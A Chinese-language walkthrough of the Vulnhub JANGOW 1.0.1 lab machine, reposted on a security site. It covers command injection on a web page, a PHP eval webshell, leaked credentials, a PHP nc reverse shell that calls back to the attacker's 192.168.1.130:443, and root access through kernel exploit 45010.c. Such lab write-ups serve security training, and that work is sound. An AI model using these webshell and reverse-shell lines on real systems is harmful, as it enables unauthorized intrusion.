Vulnhub 靶场 JANGOW: 1.0.1

admin 2025年7月1日18:49:07评论12 views字数 1290阅读4分18秒阅读模式

前期准备:

靶机下载地址:https://www.vulnhub.com/entry/jangow-101,754/kali攻击机IP:192.168.1.130靶机地址:192.168.1.139

一、信息收集

1.使用nmap扫描靶机地址

nmap -p 1-65535 -A -sV 192.168.1.139

Vulnhub 靶场 JANGOW: 1.0.1

发现开放了21和80端口,查看一下80端口。

2.收集网站信息

Vulnhub 靶场 JANGOW: 1.0.1

Vulnhub 靶场 JANGOW: 1.0.1

检查页面后发现Buscar页面有个可疑的地方:

Vulnhub 靶场 JANGOW: 1.0.1

做一下测试:

Vulnhub 靶场 JANGOW: 1.0.1

发现可以执行系统指令。

二、漏洞攻击

直接写入一句话木马试一下:

echo '<?php eval($_POST["sain"]);' > sain.php

Vulnhub 靶场 JANGOW: 1.0.1

返回200,用蚁剑链接一下:

Vulnhub 靶场 JANGOW: 1.0.1

Vulnhub 靶场 JANGOW: 1.0.1

连接成功。简单查看一下文件,在/var/www/html/site/wordpress下也发现了配置文件:

Vulnhub 靶场 JANGOW: 1.0.1

除此之外发现在/var/www/html下有一个./backup文件:

Vulnhub 靶场 JANGOW: 1.0.1

发现都是数据库的用户名和密码,但是jangow01和系统名字一样,所以我就尝试下直接登录系统,发现可以直接登陆进去:

username = "jangow01"password = "abygurl69"

Vulnhub 靶场 JANGOW: 1.0.1

可以直接在系统里进行提权做,但是通常是写入反弹shell连接,然后发现 nc 中的 -e 参数无法使用

Vulnhub 靶场 JANGOW: 1.0.1

除此之外也尝试了好几种反弹shell,发现存在端口限制,试了好几个端口后发现443端口能用,因为网站使用的是php语言,所以写入一个php反弹shell文件:

<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.130 443 >/tmp/f');?>

Vulnhub 靶场 JANGOW: 1.0.1

kali上开启监听,并且访问 反弹shell的php文件:

Vulnhub 靶场 JANGOW: 1.0.1

发现连接成功,写入交互式shell:

python3 -c 'import pty;pty.spawn("/bin/bash")'

Vulnhub 靶场 JANGOW: 1.0.1

再升级一下 shell。在home目录下发现一个user.txt文件:

Vulnhub 靶场 JANGOW: 1.0.1

用md5解不出来,然后查看一下系统版本,看看有没有可利用的漏洞:

Vulnhub 靶场 JANGOW: 1.0.1

三、提权

靶机环境是ubuntu16.04,使用 searchsploit 看看有没有什么可利用的漏洞

Vulnhub 靶场 JANGOW: 1.0.1

试了好几个后发现 45010.c 可以利用,把45010.c文件传送到靶机中,我这开个http服务:

Vulnhub 靶场 JANGOW: 1.0.1

赋一下权限(一开始我用的 jangow01 用户做的,发现无法赋权,后来试了下 www-data 可以):

Vulnhub 靶场 JANGOW: 1.0.1

先用 gcc 运行一下45010.c文件:

Vulnhub 靶场 JANGOW: 1.0.1

生成一个 a.out 文件,运行a.out文件,得到root权限,查看flag:

Vulnhub 靶场 JANGOW: 1.0.1

者:sainet,文章转载于博客园。

往期精彩推荐
Vulnhub 靶场 JANGOW: 1.0.1

记一次搭建靶场渗透过程(1)

记一次搭建靶场渗透过程(2)

记一次搭建靶场渗透过程(3)

Vulnhub 靶场 JANGOW: 1.0.1

Vulnhub 靶场 JANGOW: 1.0.1

           团队介绍

银河护卫队super,是一个致力于红队攻防实战、内网渗透、代码审计、安卓逆向、安全运维等技术干货分享的队伍,定期分享常用渗透工具、复现教程等资源。欢迎有想法、乐于分享的具备互联网分享精神的安全人士进行交流学习。
Vulnhub 靶场 JANGOW: 1.0.1

点击关注银河护卫队super

原文始发于微信公众号(银河护卫队super):Vulnhub 靶场 JANGOW: 1.0.1

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年7月1日18:49:07
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Vulnhub 靶场 JANGOW: 1.0.1https://cn-sec.com/archives/807021.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息